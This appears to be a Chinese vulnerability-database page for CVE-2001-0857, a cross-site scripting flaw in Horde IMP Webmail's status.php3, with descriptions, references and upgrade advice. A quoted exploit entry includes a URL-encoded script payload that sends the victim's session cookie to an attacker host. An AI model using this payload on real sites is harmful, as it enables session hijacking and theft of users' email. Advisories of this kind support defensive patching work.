CVE-2001-0857
CVSS7.5
发布时间 :2001-12-06 00:00:00
修订时间 :2016-10-17 22:12:33
NMCOE    

[原文]Cross-site scripting vulnerability in status.php3 in Imp Webmail 2.2.6 and earlier allows remote attackers to gain access to the e-mail of other users by hijacking session cookies via the message parameter.


[CNNVD]Horde IMP会话劫持漏洞(CNNVD-200112-060)

        Imp Webmail 2.2.6及其更早版本的status.php3存在跨站脚本攻击(XSS)漏洞。远程攻击者可以通过劫持会话cookies借助message参数获取其他用户电子邮件的访问权限。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0857
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0857
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-060
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000437
(UNKNOWN)  CONECTIVA  CLA-2001:437
http://marc.info/?l=bugtraq&m=100535679608486&w=2
(UNKNOWN)  BUGTRAQ  20011109 Imp Webmail session hijacking vulnerability
http://marc.info/?l=bugtraq&m=100540578822469&w=2
(UNKNOWN)  BUGTRAQ  20011110 IMP 2.2.7 (SECURITY) released
http://www.caldera.com/support/security/advisories/CSSA-2001-039.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-039.0
http://www.securityfocus.com/bid/3525
(UNKNOWN)  BID  3525
http://xforce.iss.net/static/7496.php
(UNKNOWN)  XF  imp-css-steal-cookies(7496)

- 漏洞信息

Horde IMP会话劫持漏洞
高危 跨站脚本
2001-12-06 00:00:00 2005-05-02 00:00:00
远程  
        Imp Webmail 2.2.6及其更早版本的status.php3存在跨站脚本攻击(XSS)漏洞。远程攻击者可以通过劫持会话cookies借助message参数获取其他用户电子邮件的访问权限。

- 公告与补丁

        It has been reported that the devel version of Horde IMP and Horde IMP 3.0 Release Candidate 1 are not vulnerable to this issue.
        It is advised to upgrade to Imp 2.2.7.
        Additional upgrades are available.
        Horde IMP 2.0
        
        Horde IMP 2.2
        
        Horde IMP 2.2.1
        
        Horde IMP 2.2.2
        
        Horde IMP 2.2.3
        
        Horde IMP 2.2.4
        
        Horde IMP 2.2.5
        
        Horde IMP 2.2.6
        

- 漏洞信息 (21151)

Horde IMP 2.2.x Session Hijacking Vulnerability (EDBID:21151)
linux remote
2001-11-09 Verified
0 Joao Pedro Goncalves
N/A [点击下载]
source: http://www.securityfocus.com/bid/3525/info

IMP is a powerful web-based mail interface/client developed by members of the Horde project.

Encoded HTML tags are not stripped from requests to access 'status.php3'. It is possible for a remote attacker to construct a link which when clicked will cause arbitrary script code to be executed in the browser of an unsuspecting user in the context of a site running Horde IMP.

As a result, it has been proven that this issue can be exploited to steal a legitimate user's cookie-based authentication credentials and gain unauthorized access to that user's webmail account. 

http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A 		

- 漏洞信息

668
Horde IMP Webmail status.php3 message Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Imp Webmail contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'message' variable upon submission to the 'status.php3' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2001-11-09 Unknow
2001-11-09 Unknow

- 解决方案

Upgrade to version 2.2.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站